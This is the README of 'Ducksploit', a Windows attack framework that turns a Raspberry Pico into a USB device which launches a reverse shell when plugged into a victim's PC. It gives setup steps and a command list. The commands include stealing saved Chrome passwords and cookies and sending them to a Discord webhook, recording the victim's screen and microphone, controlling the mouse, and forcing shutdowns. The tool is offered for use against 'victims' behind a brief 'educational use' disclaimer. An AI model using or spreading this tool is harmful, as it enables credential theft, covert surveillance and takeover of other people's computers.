DUCKSPLOIT - Windows Hacking FrameWork using Reverse Shell




Install Ducksploit


setup raspberry pico
  1. Download
  2. Extract downloaded zip file
  3. Go in PICO SETUP folder
  4. Plugg your raspberry pico on your PC with the BOOTSEL button picobootbutton
  5. Move CircuitPython.uf2 file in the E:\ usb port (port of your pico) now your raspberry pico gonna leave usb port and reconnec with CIRCUITPY name
  6. Erase all the content of your raspberry pico and copy 'copy' folder into him
  7. Write myip.txt and write your own IP
  8. Now your raspberry pico is full configured , unplugg your pico and done!
setup ducksploit commands
  1. Download
  2. Extract downloaded zip file
  3. Go in SERVER folder
  4. If python is not installed, launch 'installpython.bat' or download at
  5. Install python requirements using 'installrequirements.bat' script
  6. launch setup.bat ###MUST BE RUN AS ADMINISTRATOR###
  7. Ducksploit is now installed on your PC 😄
  8. Type 'ducksploit' in the cmd
  9. Config your ip using 'ipconfig' (your ip)
  10. Wait victim's connection using 'wait' command
  11. Have fun with ducksploit hacking commands (type help to get commands list)


Just plugg the raspberry pico in your pc (or hacker can do also) That will start automaticaly the client of the reverse shell

⚠️ Ducksploit is made for legal use or educational use ⚠️

Uninstall Ducksploit

  1. type 'ds uninstall' in cmd
  2. Done 😄


Donate 👍 using Paypal



Command Usage Result
wait wait wait your victim's connection


Command Usage Result
ipconfig ipconfig (your ipv4) config your ip


Command Usage Result
register register reconfigure your account
accountinfo accountinfo view all your account's infos


Command Usage Result
stealpwds stealpwds (discord webhook url) steal all saved chrome passwords of your victim and send them into a discord webhook
stealcookies stealcookies (discord webhook url) steal all saved chrome cookies of your victim and send them into a discord webhook
open open (applicationname.exe) open mensioned application
recordscreen recordscreen (time in second) record victim's screen durring amount of time
recordmicro recordmicro (time in second) record victim's micro durring amount of time


Command Usage Result
mouseclick mouseclick [left, right, middle] make the victim click the mensionned button
mousemove mousemove (x) (y) move the victim's cursor by x and y pixels
mousescroll mousescroll (int between -1000 and 1000) make the user scroll by int pixels
locatemouse locatemouse get the victim's cursor current locations

Alert Window

Command Usage Result
msg msg [-file, -text] (title) (line1) (line2) create an alertbox and send it on the vitim's pc with a title and 2 lines (if -file set line1 to createfile command content)
createfile createfile (text) set the content of line1 of msg command


Command Usage Result
skull skull spam cmds with skull and crossbones


Command Usage Result
uninstall uninstall uninstall ducksploit
update update update ducksploit
credits credits view ducksploit's credits
exit exit exit from the ducksploit treminal
help help getting the list of all commands
shutdown shutdown make the victim's pc shutdown
reboot reboot make the victim's pc reboot
closesession closesesion make the victim's session close
We're smart developers , and we work on Windows & android :+1: (DUCKSPLOIT is comming... :hourglass_flowing_sand: )
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Penetration testing

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